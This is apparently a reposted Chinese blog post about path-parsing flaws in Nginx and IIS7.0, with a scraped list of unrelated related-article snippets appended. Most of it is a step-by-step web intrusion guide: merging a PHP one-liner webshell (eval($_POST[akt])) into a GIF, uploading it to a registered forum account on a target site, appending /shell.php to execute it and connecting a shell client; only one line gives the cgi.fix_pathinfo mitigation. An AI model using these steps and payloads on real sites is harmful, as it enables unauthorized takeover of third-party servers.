IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0

Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。

临时解决办法:关闭cgi.fix_pathinfo为0

__________________________________

先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)

先合并一张PHP一句话图片马,合并方法:

①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif

②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs (fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"

图片随便找一张.

一句话:<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[akt])?>');?>

然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。

找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。

比如假设图片地址为 www.webshell.cc/tupian/1.jpg

则执行地址为 www.webshell.cc/tupian/1.jpg/shell.php

然后,会在目录下生成shell.php。比如: www.xxx.com/tupian/shell.php

shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。

上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。

找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。

剩下的就随便你去搞吧。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1638.html

iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day相关推荐

  1. 通杀IIS7.0畸形解析0day漏洞

    先合并一张PHP一句话图片马,合并方法: ①.DOS合并:copy 1.gif /b + 1.txt/a asp.gif ②.用edjpgcom,进行图片和一句话木马的合并, 图片随便找一张. [顺带 ...

  2. java+poodle漏洞修复_SSL3.0 POODLE漏洞修复方案

    SSL3.0 POODLE漏洞修复方案 发布时间:2014-10-15 15:02:27 关于SSLPOODLE漏洞 POODLE = Padding Oracle On Downgraded Leg ...

  3. iis php 缓存时间,推荐 IIS7.0下ThinkPHP提示“缓存文件写入失败!” 需要设置user的权限即可 Home/Runtime/Cache/...

    IIS7.0下ThinkPHP提示"缓存文件写入失败!" 字号+作者:有田笔记 来源:有田笔记WP老站 2015-12-11 01:05 我要评论() 收藏成功收藏本文 :(缓存文 ...

  4. shrio反序列漏洞修复_Apache Shiro Java 反序列化漏洞分析

    Author: rungobier(知道创宇404安全实验室) Date: 2016-08-03 0x00 概述 Apache Shiro 在 Java 的权限及安全验证框架中占用重要的一席之地,在它 ...

  5. 阿里云安全漏洞修复_7种云计算安全漏洞及其应对措施

    阿里云安全漏洞修复 Companies are rapidly using the cloud to revolutionize their digital transformations. Acco ...

  6. e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过

    话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...

  7. IIS 的负载均衡【IIS7.0以上才可以使用】---- Application Request Routing(ARR)

    1.ARR依赖于以下组件: Microsoft URL Rewrite Module for IIS 7.0. Microsoft Web Farm Management Version 1 for ...

  8. ewebeditor文件上传漏洞2.8.0版本(漏洞复现)

    漏洞概述 ewebeditor 是常用的网站后台编辑器,此编辑器有asp等版本. 登陆后台之后,可以通过修改上传文件白名单的方法,任意文件上传. 漏洞危害等级 高危 影响版本 v2.8.0 漏洞复现 ...

  9. dns服务器漏洞修复,KB4569509:DNS 服务器漏洞 CVE-2020-1350 指南

    简介 2020 年 7 月 14 日,Microsoft 发布了针对 CVE-2020-1350 | Windows DNS 服务器远程代码执行漏洞中描述的问题的安全更新. 此通报描述了影响配置为运行 ...

最新文章

  1. E667:Fsync failed(how to solve)
  2. 亲 , Zookeeper了解一下 : 概述
  3. 解决log4net独占日志文件的问题以及 log4net的各种输出配置(Appender)
  4. docker logs 容器日志文件路径查看
  5. python调用rust_转 从20秒到0.5秒:一个使用Rust语言来优化Python性能的案例
  6. 用getBoundingClientRect()来获取页面元素的位置
  7. [原]排错实战——通过对比分析sysinternals事件修复程序功能异常
  8. 学习笔记 vs19 报错:E1696 C++ 无法打开 源 文件
  9. 下半年登场!小米MIX 4概念图曝光:有望首发屏下摄像头
  10. 网络ip计算器工具_火影忍者联名款计算器上市,卡西欧玩转IP联合
  11. 荣耀赵明 “Diss” 5G 手机;甲骨文创始人埃里森:Uber 一文不值;Chrome 77 发布 | 极客头条...
  12. 批处理(bat)文件中输出中文乱码怎么办?
  13. ITIL4讲解: 组合管理
  14. docker如何配置阿里云加速器
  15. udhcpc6的default.script
  16. Cass符号填充设置
  17. 国务院发展研究中心发布《中国云计算产业发展与应用白皮书》| 附下载
  18. c语言编程中的或逻辑的符号 符号如何输入,C语言中逻辑运算符(,||,!)和位运算符号(,|,^)...
  19. 测相伪距观测方程、线性组合
  20. loj #6570. 毛毛虫计数

热门文章

  1. ALD和CVD晶体管薄膜技术
  2. Linux下Flash-LED的处理
  3. 常用深度学习框——Caffe/TensorFlow / Keras/ PyTorch/MXNet
  4. 目标检测中的anchor-based 和anchor free
  5. 2021年大数据Flink(十):流处理相关概念
  6. pip install scipy和matplotlib报错的问题详解:(pip install其它时报错通用)
  7. python 内置函数map的使用
  8. Android ListView item设置分割线以及分割线宽度
  9. 网站项目必备——12款白富美型 jQuery 图片轮播插件
  10. 适定、超定和欠定方程的概念